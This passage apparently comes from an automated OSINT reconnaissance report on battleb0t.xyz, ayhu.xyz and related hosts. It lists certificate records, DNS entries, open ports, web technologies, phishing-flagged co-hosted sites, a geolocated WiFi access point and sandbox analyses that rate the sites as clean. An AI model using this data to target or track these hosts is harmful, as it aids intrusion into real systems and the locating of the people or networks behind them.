u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.07', u'id': 8196466589}, {u'not_after': u'2023-03-14T04:12:06', u'not_before': u'2022-12-14T04:12:07', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'00ff0e1ea46f55f0740eb383e107c9ea93', u'entry_timestamp': u'2022-12-14T05:12:08.377', u'id': 8196466213}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:55.433', u'id': 8209126729}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:54.573', u'id': 8196005223}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:55.143', u'id': 8206782905}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:54.437', u'id': 8193169403}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.931', u'id': 8206381262}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.083', u'id': 8192906588}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.988', u'id': 8206326761}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.756', u'id': 8193180831}] |
| 2023-05-12 02:44:40 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Bootstrap | funny.battleb0t.xyz |
| 2023-05-12 02:55:58 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://mu-ldn.com/manifest.webmanifest', u'signatures': [{u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /manifest.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: mu-ldn.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /manifest.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: mu-ldn.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: mu-ldn.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: mu-ldn.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_f04_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_f04_IE_EarlyTabStart_0xf70_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_f04_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3844"\n "IsoScope_f04_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_f04_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_f04_ConnHashTable<3844>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3844"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1F16.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1EA6.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab1F15.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1EA5.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "8G5IMZ7J.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8G5IMZ7J.txt]- [targetUID: 00000000-00003844]\n Dropped file: "SKIYYQQ6.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SKIYYQQ6.txt]- [targetUID: 00000000-00003844]\n Dropped file: "JIRKGKO6.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\JIRKGKO6.txt]- [targetUID: 00000000-00003844]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003984]\n "~DF43978725F0AD1A9B.TMP" has type "data"- Location: [%TEMP%\\~DF43978725F0AD1A9B.TMP]- [targetUID: 00000000-00003844]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "RecoveryStore._E36934C7-825A-11ED-BF59-080027782352_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF0DA2B49B9610E864.TMP" has type "data"- Location: [%TEMP%\\~DF0DA2B49B9610E864.TMP]- [targetUID: 00000000-00003844]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_1FE77DAC-825D-11ED-BF59-080027782352_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "Cab1F15.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab1F15.tmp]- [targetUID: 00000000-00003984]\n "Tar1F16.tmp" has type "data"- Location: [%TEMP%\\Tar1F16.tmp]- [targetUID: 00000000-00003984]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003844]\n "Tar1EA6.tmp" has type "data"- Location: [%TEMP%\\Tar1EA6.tmp]- [targetUID: 00000000-00003984]\n "manifest_1_.webmanifest" has type "JSON data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003984]\n "~DFF051838F7FD5BBCA.TMP" has type "data"- Location: [%TEMP%\\~DFF051838F7FD5BBCA.TMP]- [targetUID: 00000000-00003844]\n "8G5IMZ7J.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8G5IMZ7J.txt]- [targetUID: 00000000-00003844]\n "~DF0DFB95FF6079C014.TMP" has type "data"- Location: [%TEMP%\\~DF0DFB95FF6079C014.TMP]- [targetUID: 00000000-00003844]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "SKIYYQQ6.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SKIYYQQ6.txt]- [targetUID: 00000000-00003844]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://mu-ldn.com/manifest.webmanifest"\n Pattern match: "https://mu-ldn.com"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /manifest.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: mu-ldn.com\nDNT: 1\nConnection: Keep-Alive"\n "84x384"\n"type":"image/png"}\n{"src":"icons/icon-512x512.png?v=b44b0926b149aa4cd85edcd506979c33"\n"sizes":"512x512"\n"type":"image/png"}]}", "HTTP/1.1 200 OK\nAccept-Ranges: bytes\nAge: 0\nCache-Control: public\n max-age=0\n must-revalidate\nContent-Length: 962\nContent-Type: application/octet-stream\nDate: Fri\n 23 Dec 2022 01:35:59 GMT\nEtag: "33b3e5c95c7e0830ca5bead07af4cfd0-ssl"\nServer: Netlify\nStrict-Transport-Security: max-age=31536000\nX-Nf-Request-Id: 01GMY9YV97T1TAAQKCFFGSK6XR\n\n{"name":"gatsby-starter-default"\n"short_name":"starter"\n"start_url":"/"\n"background_color":"#663399"\n"display":"minimal-ui"\n"icons":[{"src":"icons/icon-48x48.png?v=b44b0926b149aa4cd85edcd506979c33"\n"sizes":"48x48"\n"type":"image/png"}\n{"src":"icons/icon-72x72.png?v=b44b0926b149aa4cd85edcd506979c33"\n"sizes":"72x72 | 104.196.30.220 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | flinck (Net ID: 00:01:24:F1:89:80) | 52.3759, 4.8975 |
| 2023-05-12 03:13:06 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [007jedgar.github.io]
https://www.openphish.com/feed.txt | 007jedgar.github.io |
| 2023-05-12 03:09:37 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 224.30.196.104.bc.googleusercontent.com | 104.196.30.224 |
| 2023-05-12 02:55:11 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["163"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Keep_Alive": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Last_Modified": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "Keep_Alive": ["timeout=5, max=100"], "Server": ["LiteSpeed"], "Connection": ["Keep-Alive"], "Last_Modified": ["Wed, 17 Jun 2020 20:01:33 GMT"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"], "Accept_Ranges": ["bytes"]} | 87.248.157.102 |
| 2023-05-12 03:03:30 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0065paula.github.io |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/master058_1.PNG | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:34:29 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 45.131.109.62 | 45.131.109.53 |
| 2023-05-12 03:13:10 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [etherum-libs.github.io]
https://www.openphish.com/feed.txt | etherum-libs.github.io |
| 2023-05-12 02:54:27 | Open TCP Port | No | Censys | 0 | 0 | 4 | 0 | None | 2600:1f18:2489:8202::c8:80 | 2600:1f18:2489:8202::c8 |
| 2023-05-12 02:44:09 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 1 | 0 | None | battleb0t.xyz:443 | battleb0t.xyz |
| 2023-05-12 02:44:05 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 1 | 0 | None | Cloudflare Inc. Cloudflare | ayhu.xyz |
| 2023-05-12 02:44:21 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nuke.battleb0t.xyz | CN=nuke.battleb0t.xyz |
| 2023-05-12 02:45:36 | Raw DNS Records | No | DNS Raw Records | 0 | 0 | 2 | 0 | None | funny.battleb0t.xyz. 300 IN CNAME frabjous-lebkuchen-324004.netlify.app. | funny.battleb0t.xyz |
| 2023-05-12 02:49:34 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 17, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://jonwhitestudio.com/', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-7', u'name': u'Loads modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" loaded module "KERNEL32" at base 54ab0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-STRING-L1-1-0" at base 51b20000\n "msedge.exe" loaded module "API-MS-WIN-CORE-DATETIME-L1-1-1" at base 51b20000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-OBSOLETE-L1-2-0" at base 51b20000\n "msedge.exe" loaded module "%WINDIR%\\SYSTEM32\\IMM32.DLL" at base 55510000\n "msedge.exe" loaded module "API-MS-WIN-CORE-SYNCH-L1-2-0" at base 51b20000\n "msedge.exe" loaded module "API-MS-WIN-CORE-FIBERS-L1-1-1" at base 51b20000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-L1-2-1" at base 51b20000\n "msedge.exe" loaded module "%WINDIR%\\TEMP\\VXOLE64.DLL" at base 44ff0000\n "msedge.exe" loaded module "NTMARTA.DLL" at base 50ad0000\n "msedge.exe" loaded module "KERNEL32.DLL" at base 54ab0000\n "msedge.exe" loaded module "COMBASE.DLL" at base 54f70000\n "msedge.exe" loaded module "OLE32.DLL" at base 547e0000\n "msedge.exe" loaded module "%WINDIR%\\SYSTEM32\\UXTHEME.DLL" at base 4ffd0000'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-8', u'name': u'Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"@ntdll.dll"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:3236:120:WilError_01"\n "Local\\SM0:2928:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:2928:120:WilError_01"\n "Local\\SM0:3236:304:WilStaging_02"\n "SM0:3236:120:WilError_01"\n "SM0:3236:304:WilStaging_02"\n "Local\\SM0:3236:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3236:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3236:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:3236:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cloud.typenetwork.com"\n "jonwhitestudio.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"\n "142.250.191.40:443"\n "151.101.1.91:443"\n "142.250.189.238:443"'}, {u'category': u'Pattern Matching', u'origin': u'YARA Signature', u'identifier': u'yara-104', u'name': u'YARA signature match - RC4 Encryption', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1486', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1486', u'relevance': 5, u'threat_level': 0, u'type': 13, u'description': u'YARA signature for RC4 encryption matched on file "widevinecdm.dll"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpsjonwhitestudio.com" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Site Characteristics Database\\000003.log]- [targetUID: 00000000-00003236]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00003236]\n "f_00023e" has type "Web Open Font Format (Version 2) CFF length 42632 version 2.0"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023e]- [targetUID: 00000000-00005628]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003236]\n "71b8d211-731c-4c7b-833c-eb5281c135d2.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\71b8d211-731c-4c7b-833c-eb5281c135d2.tmp]- [targetUID: 00000000-00003236]\n "f_000243" has type "JPEG image data Exif standard: [TIFF image data little-endian direntries=0] baseline precision 8 3090x1512 components 3"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_000243]- [targetUID: 00000000-00005628]\n "manifest.json" has type "JSON data"- Location: [%TEMP%\\3236_351054471\\manifest.json]- [targetUID: 00000000-00003236]\n "f_00023d" has type "JPEG image data Exif standard: [TIFF image data little-endian direntries=0] baseline precision 8 1000x489 components 3"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023d]- [targetUID: 00000000-00005628]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\OriginTrials\\0.0.1.4\\manifest.fingerprint]- [targetUID: 00000000-00003236]\n "edge_autofill_field_data.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Autofill\\3.0.0.4\\edge_autofill_field_data.json]- [targetUID: 00000000-00003236]\n "49bd05701c59769f_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\49bd05701c59769f_0]- [targetUID: 00000000-00003236]\n "16973868-0a70-4008-a528-95f61f45524c.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\16973868-0a70-4008-a528-95f61f45524c.tmp]- [targetUID: 00000000-00003236]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00004972]\n "e0680e1b-98b7-4c75-9bb0-40225dedbc07.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\e0680e1b-98b7-4c75-9bb0-40225dedbc07.tmp]- [targetUID: 00000000-00003236]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00003236]\n "b4ff48f4-20ee-483b-a145-b93992192217.tmp" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\b4ff48f4-20ee-483b-a145-b93992192217.tmp]- [targetUID: 00000000-00003236]\n "adblock_snippet.js" has type "ASCII text with very long lines with no line terminators"- Location: [%TEMP%\\3236_1474835879\\adblock_snippet.js]- [targetUID: 00000000-00003236]\n "52c697f3-a2b7-49a3-af0f-66bf07c9173d.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "deny_domains.list" has type "data"- Location: [%TEMP%\\3236_351054471\\deny_domains.list]- [targetUID: 00000000-00003236]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://jonwhitestudio.com/"\n Pattern match: "https://jonwhitestudio.com"\n Heuristic match: "cloud.typenetwork.com"\n Heuristic match: "jonwhitestudio.com"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/93 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "10.34.0.43" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.43"'}], u'threat_level': 0, u'size': None, u'job_id': u'6404e67292fd2ef63a0cf584', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'suspicious_identifiers': [], u'attck_id': u'T1129', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Shared Modules', u'informative_identifiers': [], u'tactic': u'Execution', u'informative | 185.199.110.153 |
